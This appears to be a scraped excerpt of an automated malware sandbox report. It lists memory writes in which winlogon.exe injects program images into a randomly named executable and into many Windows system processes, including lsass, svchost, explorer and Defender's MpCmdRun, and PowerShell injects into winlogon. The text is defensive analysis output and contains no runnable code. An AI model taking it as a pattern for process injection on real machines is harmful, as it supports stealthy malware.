        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 18D132A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1B780BB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 264072F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5BFFD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1AE450000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 234FE4F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1AAD1C40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: PID: 496 base: 7F20000 value: 4DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6304Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 1B9277D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 2158AEB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E89FDC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 1F088910000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AC86F40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 14785F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC59CE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16588B90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A8CDB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F34D880000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 220C26D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25AF1E60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27BFF5C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CEE0560000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B12B360000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D16AC90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 244678A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 183B0DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1805B940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 191051C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD35360000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C3D9B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 12411140000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D66E190000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 25F19560000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BCA63A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E8FB3B0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F30F940000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 19CDA5A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 6E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A5F41B0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 27B14120000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BCB8350000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 17A379A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 250F1D60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 11DEF540000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 23B351A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA9F190000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D56C5D0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E5CF260000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B558CB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 17A21740000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 20FA22F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD4E000000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\sihost.exe base: 17B78700000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 22EB7B30000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 210A8A00000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 2B28DE00000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 157ABEB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 25BB8540000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E697F40000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\explorer.exe base: 7F20000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 15C57B50000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 2B9EF760000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\dasHost.exe base: 24C894C0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 21F961C0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C81BC40000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2904A8A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\dllhost.exe base: 2436BB30000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 172339F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 26FA2F80000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25BE2B30000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 272D8A60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F8FBBC0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1CF2A9B0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20537200000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\conhost.exe base: 1E3C3A90000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 29B0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\dllhost.exe base: 20E40470000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 238A9A60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AE0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1040000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1480000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: DB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1300000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B90000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3040000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B30000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D10000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 22A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AD0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2700000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 8A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2A50000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 3010000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 980000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: D80000
